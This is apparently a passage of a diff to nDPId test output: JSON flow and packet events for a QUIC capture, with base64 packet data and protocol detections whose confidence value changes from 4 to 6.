mawxSMzPdml\/FM\/zeE6Dlz+9BPCv+f08v5Fn9tMUAsDXRUKY+8WZNa7DgQzfNejuemuadnwoPLOzzh2w6xM0Rzp6OEuIpQFyQW5xNjLrzOOpMaJIzF2sqpzwfuKJCm3s1snEjO84ddDhgxqjSj4lavW+riy8zgmEWo47r2DqOd3WghFxjV8xyvlVX1uHWa05pzMGWfGeumcPVMyT0adU5+wJkEcRvHBRw+oHJsqaukZHSI5JJYAbZf1ESnjxhCqHtgklzs9ImmCW7GeF21uZglW+vjLUsQcwNpF8zy37gmZdX4j9TzC1fY1ZjbAZMCcZltyE4Ua\/HE9Gr4qIttYQRoSXvemLO35Ifzyp3YBJuix7D\/0G7UY96\/ygRaDjJYKdA8flhrjpLc01yADTlcnXVTVLb1A6zKUqy1IoG\/Tlk\/z3cQ9+IaG0ETvoH+URSO+Wy5\/31GgH86Fb91IlFWvBBgEg9o5mtJE4ZjuQeHoeCfnmV53e5D0s6e1mLoSTRslkgBkyPIHBkD+AfULG9yRcBDRHLVOUtHMauEJx5SFk6LDE48gvZ\/W14DPXuSshpkqThd+a9l965NCkiqLzobezcZyu8ONMCL4aWAP4JD6b0Xp08jXqOcZYqiJ7NZSbad15kseZHdYQvvA+PJhUbcE5YZWcn\/xOb806apm1GAxXDo9cx3POklhJ0tzP\/LMU\/8cl+t2ZxNjURhO8nGFdQRgkvW6BDfHMzQeR6PbeH3pEswauHhyM5fr7Wk49wwwktzukldwFbMPCg9p87hqBsGVxIND1WlwqOlV\/lxMTiW\/q4zZTP6jyb8htKoyq380p91mZyV0+Qdr+Qa7+\/NlUYv8PEee2yAJ5phlblYmFxIh\/JvKbTy5doeGxfVsMIJdICKa5u7\/SlsDHJCHaQdFlIVGoLAQ1H8FpK6Y\/P56TfHflnO\/ivZWYw6MQJh9riQHgPJbhr65Ah4Btxq8WeMahT6b7GzECoVCR8QqXUp3Q"} -00922{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":61,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621433390651,"flow_last_seen":1621433390651,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621433390651,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"153.98.28.78","src_port":58414,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.DoH_DoT","breed":"Fun","category":"Network"},"quic": {"client_requested_server_name":"dns.google","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"78ba053b9aa352e84a4eea899207839a","tls_supported_versions":"TLSv1.3"}} +00922{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":61,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621433390651,"flow_last_seen":1621433390651,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621433390651,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"153.98.28.78","src_port":58414,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.DoH_DoT","breed":"Fun","category":"Network"},"quic": {"client_requested_server_name":"dns.google","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"78ba053b9aa352e84a4eea899207839a","tls_supported_versions":"TLSv1.3"}} 00632{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":62,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621433411827,"flow_last_seen":1621433411827,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621433411827,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"16.232.218.117","src_port":61341,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02311{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":62,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":50,"flow_packet_id":1,"flow_last_seen":1621433411827,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621433411827,"pkt":"AAAAAAAAAAEASYHhCABFAAVixWVAAH4RXjKokEAFEOjade+dAbsFTkGKyP8AAB0ID6UbviYe1OcAAEU0lEpFVo61ttZD0\/Guo\/jnAnR9jv+k5pAvfeBeOWD6Cm8zeiN4ecxHXQbeJAslmDKkgnaApPPGNJshgoi7VzHr\/rv4f991MIah9Z0x3iwrLSqHm+jIfLQxfiAPFuB9rLMf4f5yjsUpTl7yYpryWfDoVmV2zU2awpg5MyVbMiWeuULv\/hrjEOVgd6zoPwwK5dF1RV\/wrIcyIIMUpE+r5n8s58GUzUdN3AhPEbNnKhRwC6RWrqA+i0cqa8ctZWlgocKvytYgiqCsqMVO3NdyZSTFiTuNzFYJLpfFCUzIPf63hLzpNqbjK63qqYHIxdtHDARFoPxNzOgrVier\/q2WjzxC+M6mQi+H2pqwgvmMAlvMEtDd1ZlAWkzOl4G\/oReq\/ToNk7RekeRqvxLV\/VeSMXbYuQGNbpu2wr1Wxl6BibYf\/79Z3rObQtiyM19RxMxp7mdvUcLeIhqREsWiAfd+i1zPeTFCw+TQxI+c7b8r8\/XfC6A0KPfbtIIopv4Md8ZWbT8evvkG1J7aQcX8LESarYbxGnYGbIKbRvieAyXupa9DNkt5ydiaOWNMWmnYatZS7q+vJrXn89FucDVT03eSB8\/l5O5rpocuX6dFZiCeqampgTCdr3kOlnlcPHHqJr+VaFY4vr5Xyh5EHsikjEWIGozPdc7jEZtWf3uYTyNQsjZBZgpnS7YJW7nOT2DjNWT0GWwr0Ic1PXuo8I2w5qSUux7ny0enp7B\/26GObK7DIsMjzFG8UHaQBBmT\/Gf6mdO5kccDPkmAWHe0oXsNPt7\/TmoB8HTzqmFM3q5jiptukUvnl6h3hrA4tDcWF6r6\/VaXFDgQChkQm\/m5WrQEKH+KSIIwCREIKBUb3xaKQEJM4DmC+PDjOpNX2TtmlEUfuimAq0RFbxofd+ZiNjHaNh9WW79+yMMNubGxcKaeiIUpxvvl+n8zGFM11cyoFugluYbAi8iHUHh3Cjjf9i8p\/JBp8Lwsqt8GOKWBoZr8Pv9Qwx\/yhIn9+hyt75NZceSkQPB2HilwbRmKH9ZWN1RLraLSCDjLFZUoXLSdJR3\/RNAs+0evfZVDyjhtDb9Eybgu7J\/eCdLlS3X6ZW+L84u+0SQDGVf6Ood3an8Co1tUKtWj0PhIkidMAwm1PT4EdcGZ0Og4+2sY64xmsHSK3dYm3M1QvEAwoRAl7F2yqmYCv7brxvtZjAJQRQ+SvKtUx9c5gyIckMAAQPNHHrAiKGz7YZtDQNhcaxQR3kHPlUSzEMcAKMY1RR7CN\/pSeooHbHeCdnLpRnly2OT\/HcsGFzOvorJJhV2IGzqc5eU85yleqWqGU4sEQpVrPVOXIbwh\/xWWQ3840ZM2zRH5KGNip5J0esfDT3r1uD4+AX0TrvlQvBmkVKYVu8\/Dc9JFMO8ks11koiARJyBa1p\/sYHKBx1429RrmPqPI1XGKrymUtfQLC1CjqDyMOcxMqXqHjOsV2W9Oe3aLqW0jqS4duUkIT45+NWUAEWQ5dcCvojudybcgB4i60UXLIJevToJ3JBxhaiZ0CBRlMiKqo7D27zgr1XJAjPS+feRSz+BJmxsqmY7bE7m7oRlxsN1qe0wj+Y+9szslqshgyS2A5FJDMEnvbShUgke31IlErYOEjA3M5ysDeUu5PO3ZaH7U9PkLACney3E6ldmC+Nm2iaW6IcjlkqsHCdTehMCOgQeKjiT8gNfoQUi0sDE1nb57Dfx6ucdbSEHW6ULrwjrSydeaPhk7\/b\/ZyzdR5QbL\/8bpPlib01D2Ts9qawYdi2FBumvw"} -00948{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":62,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621433411827,"flow_last_seen":1621433411827,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621433411827,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"16.232.218.117","src_port":61341,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"},"quic": {"client_requested_server_name":"r9---sn-vh5ouxa-hjuk.googlevideo.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} +00948{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":62,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621433411827,"flow_last_seen":1621433411827,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621433411827,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"16.232.218.117","src_port":61341,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"},"quic": {"client_requested_server_name":"r9---sn-vh5ouxa-hjuk.googlevideo.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} 00633{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":63,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621433443702,"flow_last_seen":1621433443702,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621433443702,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"113.250.137.243","src_port":56683,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02314{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":63,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":51,"flow_packet_id":1,"flow_last_seen":1621433443702,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621433443702,"pkt":"AAAAAAAAAAEAWIVLCABFAAVi+6RAAH4RF2OokEAFcfqJ891rAbsFTomjw\/8AAB0IUmuY6nOze38ANwCN5aNI0Jhzv9NOMh\/1sz8Pq4SZBhXzrMMmdjZzrQgjx1zkkutKHQB1oDFT8L80Z4Aw8jSNx3hE\/Zw\/laqqIbhk2h4AYI8E2Ksg3Sfl+5RD5Qe9ekCyVbSOIn\/RQGKQ+Ysrz4swQWQlQaC+KtSVXMe3vllDuG\/jjZv8zSYZWp4V2dx8qPMZPOw3vPgkM\/WcagE5PucdMP+3itniSXOFzVDdgXKq5nmt+7yYD1XqERMNH7mUp+JRrWe4XHV7cKX02FgoGRmWOpxUJWFf7LJEmXiGcbi7Y0jE\/h\/OYXsowiB1squTTDTuQqDqWuYNEAOZV9SOZp2L7pqHnGTE9iJVdZW+JFE20DbZCic3DVlzGwLNvFMykQy2R19YE9TfCuZrbfxU0FPlLGpo5fIWWWvDAVoqbqVmZqEGwcTHzgV8Yz9EUd9TKsk+pq6On9FaEMp9uqGWWwnxo3eZj0TPa3FIym2Jcz1rAVeaoddUuSsIGRkpmLUnVQPtQlzkUneg+9hSBIQzKf0B4JD4gK60cQ+wEib\/Mlb2svj8AwuMbD42dbbUAldY8vdc2R6SBT7hjpHRBMRK\/23CtpazJepPZW9TaqY1KH0Tz\/rdqetAkIpplEYk8d\/g9AITDWSrF8e6zya2TMq79ase5qJDl1I7B2BaCwE6uBrcM3YNywAaodudS6yBo7OBmzBJLhjcpawpG1VBepprPrMyQKdKRaLIppfRPMpB1zNwIz1B\/b0n29UJhF6mBe0rd\/G89yqhkXZrgizvDrWltB8tOP9SBV2j6Lu0+wAsCdQXImvD3VUPci4NZs5GU7Vvk\/ru8p8qVRhy1G9PMoV9S29kH3cyerovTX6XCRqhXT7LjRT227GeRmtu3e6LKmxiCSV16aoE86qsn7s15ede43yipjlcC2hBClsbMTb2sd2VPU5sjNA7FNWxGPJemWAv1BZza5EgN49CYT43mq\/jV+DKvYykpvXjR7AtKXJDZ6Sjxau21\/2SoAW9fknYkCMN\/b6sBb\/fb2UpjRQ7vtJeLKXxg6xRmaSy02gAXGTje9zcd4wsNhHKa5efII9Ck1SaDqkDwzSlV1MgZYsboWuDhaRPboyD3HUhtACz7J+Y3TYKG8hOhjZ4ZCZgGjHzNSe75OGW465v+X67ja\/0mNh37VVVzJ8W2qxkDcAd6QHJT+qyXR64+O7B10B7DO9voZAqB4B7NmlTjFKRebbQu57q54zPuFHoi5ShAmQQ9UaPbGtA3CwzY355cHS0TvLRROOxD2CS17paHw+jZFFnHn5LXH6snBlWaDVhRzqR\/YYGoi4d\/7LIG+yhTFvXfp4vXRdxfwTSW\/47XWHABPYfJ6vXmF0ZlSVMGkkiLOES0NuVRKMFyi4Xev+x7I5SlwVCu+Rvq8DSRF1MfjOJeMPXW0T\/Ekz0FDO4mP35HA\/3PeK18zuOlO37CdOsUXKnqLocCevQv9jz5q7vVxas6jE8BkD4uQY8aeyRiiKzeZh2\/lVon6R7IS4sMXdz1t4wPZr1ILCy8wM7LjPHggzpJxmfuu9E7qlOH406tiQeyFo7FY1H2GOapGdOKVftFin6pO7IjV88AyDx+yPUwuSKzmoqNi6P6VAErvOi4bRjw\/kYQg9LGmC02XKMWGdyW3mVcI\/8x\/3TkI4csH2+tr+BfT74D5aoqvH+ZJSLn0rurteuEBkZW2fndLeNUkyWzU015vCQoZJqvTClWmVcG9CLZn2rbyhXrUHNKkVJ+wn4ARFcIHQUVc7egurai3mUfPedLQU\/iDA4\/fPb"} -00930{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":63,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621433443702,"flow_last_seen":1621433443702,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621433443702,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"113.250.137.243","src_port":56683,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Cloud"},"quic": {"client_requested_server_name":"b1.nel.goog","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"78ba053b9aa352e84a4eea899207839a","tls_supported_versions":"TLSv1.3"}} +00930{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":63,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621433443702,"flow_last_seen":1621433443702,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621433443702,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"113.250.137.243","src_port":56683,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Cloud"},"quic": {"client_requested_server_name":"b1.nel.goog","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"78ba053b9aa352e84a4eea899207839a","tls_supported_versions":"TLSv1.3"}} 00632{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":64,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621433521961,"flow_last_seen":1621433521961,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621433521961,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"16.232.218.117","src_port":64700,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02323{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":64,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":52,"flow_packet_id":1,"flow_last_seen":1621433521961,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621433521961,"pkt":"AAAAAAAAAAEASYHhCABFAAViy8RAAH4RV9OokEAFEOjadfy8AbsFThT+z\/8AAB0IhJNYKtANuoMANwBQeqOywn67qncKSnTvuagILGVnNcalwuzGeiHpkW\/r3QudQ1Xg+atf32S0lvogd+2\/QThXrAhE\/UcbE6\/9d3ne8M3mBUbLc5y01PqU2r3V84i6i2XGKABZLB+Bshg3DGbuuyaaRbJCJtO6TLBrd9b6D0pWzrZ8i\/Gz8PAIyMOtI5BQl03yZpQuNeBtefp5qB7VZ9vAjNbT9Fi4jMJzpK4LOjIjHvho5UD9A1tQPssWUuiaB6ShmA41Ky2YyAUYb6Vh9rcHTQmUf36RXRjnMENcqSJ0txZ5HLa+JL\/wc7MLe4cFuMGhbo5QOrIDZl0OqxsRLbUuyHXXUj9iT0oZwwV9OPcMhzRgBCvFYPYmfISQRYW788jLzx1jI6Om66CAeI+GlZoG8XjCWvwTBZh4\/jd+ih5NAhEs\/yPoFHJAITJIoFzfVRs\/ZlaeaD21dhSdkLyQXvL6YrShajAQAL8QQuvvPxp1O9trw\/J1Y0yCHlbqft4HIR8bieoeKqFBtn8Vf4OzAvdIKL73M4BelKj2NgPZYdKz8+ZqUObz8td1TnEc2GZAidUp2ZVWI5XtiTBVv6\/1haOTwC\/f72jS66IjYphHkAjFY9qrDEJPRir2QNSQmatmWbaYhNe+qzzpKOsUSXAhbo1oQcAl+l2H9vJ\/DIQa\/AxSESBrwxGM4fWVLKqEAfMznZCtqu5fIZYleZVlEdE5C6lkvCY2W3xT+YJ1bOncdsHPT\/WGTsfc2kcqrsadebK7YP96vtKb5\/Kwjr0TCYEIvC8vfon2QAbzWY\/JCGhSEYUqb+8HgxwXZ9GWYITX\/BiqiLCdU8Aq6m\/J2oBNQp41WFXol9NeIYQ\/ENO\/iD4I\/DEE\/++\/78B3gyY1sn1rZXJOK0OaZecB3oIp5CHb8DPBBomL5i+kCg55mQYZXdBZu+\/tPycOr6KZl91KRXD7Z7TalELPSIUYpOBkmxHSZ2pvbUBnFHUY\/pw8Iwss0KbgupzZx7PD0GBpeEIyl45N0\/CmlN9QuyhgtpFSdG76LgGZLszlzyntz5P0kwUusECVbIv+39Djz82FK54YD4N+JgQBI2jcM5Zrwk2YhbYd9NpBrDQWUXA9bJsyou+uE1gnkTh+CuICnZY1UDepbEYOVkXeD6R6MgAu0d03kX9pBp4HBB2snNUvQ2Oyw65UsJhUcink0Bfa6N1+jzB8j4NevywJoM\/frbsYzOsqLw3giaa6WuLFmKpE+IZ10TEjlyFlcukcQlZ+NNObDfykNCzzBy0AcMVQaUSbjFM9ZqN+w532wfhRNhL\/F83rzAuxIgJ0n7kuWgx1Jmzauv+GuAQAe\/Uw+HEgG6V+kg9JoZLVZYLKoIXp7Z\/RGXpWG6+88\/QUBnYEjIVJi3NA4jv6spgUguU8hnlk0dwaGaTgDd+E3pAJh1qiy6G4I6\/yNiu8puzdQ2UZXW5DSLwiSIdluiR43lhltbHf\/kT4ogbkuhAZhjh\/hPFlOMFqyWyJNLdSoLKPFvtXO5THZjGcQf64KDQ+Abf7vsxCS6V\/yIHUSA+iidaY5kvUUh1iHjGk0QAUUnvwTyQXCrz5Lw8M0X\/+XryPxtPTET5dAXJHe7twTSv+4wTKnufI1RxQCzNHd\/d8PrkscC7FBMhp5+jPQuyuCQJrAnnf4c5Q9OIbgJM125\/9n8YnDbNwguEGB0mPAkvI3jKFLHb1CFQcgY8kEl\/0mjy6bPZdm5nVzmX0ouDvUmiEZcGPawl5Bk3IHTCTM4+6WoZMUTAFfn6ItnEi7vfqWVc34jJvA3AQ"} -00948{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":64,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621433521961,"flow_last_seen":1621433521961,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621433521961,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"16.232.218.117","src_port":64700,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"},"quic": {"client_requested_server_name":"r9---sn-vh5ouxa-hjuk.googlevideo.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"78ba053b9aa352e84a4eea899207839a","tls_supported_versions":"TLSv1.3"}} -00736{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":65,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":48,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621433323690,"flow_last_seen":1621433323690,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621433521961,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"113.250.137.243","src_port":56844,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Cloud"}} -00734{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":65,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":47,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621433300632,"flow_last_seen":1621433300632,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621433521961,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"108.171.138.182","src_port":50552,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}} -00729{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":65,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":46,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621433283660,"flow_last_seen":1621433283660,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621433521961,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"153.98.28.78","src_port":59622,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.DoH_DoT","breed":"Fun","category":"Network"}} +00948{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":64,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621433521961,"flow_last_seen":1621433521961,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621433521961,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"16.232.218.117","src_port":64700,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"},"quic": {"client_requested_server_name":"r9---sn-vh5ouxa-hjuk.googlevideo.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"78ba053b9aa352e84a4eea899207839a","tls_supported_versions":"TLSv1.3"}} +00736{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":65,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":48,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621433323690,"flow_last_seen":1621433323690,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621433521961,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"113.250.137.243","src_port":56844,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Cloud"}} +00734{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":65,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":47,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621433300632,"flow_last_seen":1621433300632,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621433521961,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"108.171.138.182","src_port":50552,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}} +00729{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":65,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":46,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621433283660,"flow_last_seen":1621433283660,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621433521961,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"153.98.28.78","src_port":59622,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.DoH_DoT","breed":"Fun","category":"Network"}} 00630{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":65,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621433567521,"flow_last_seen":1621433567521,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621433567521,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"9.65.169.252","src_port":60936,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 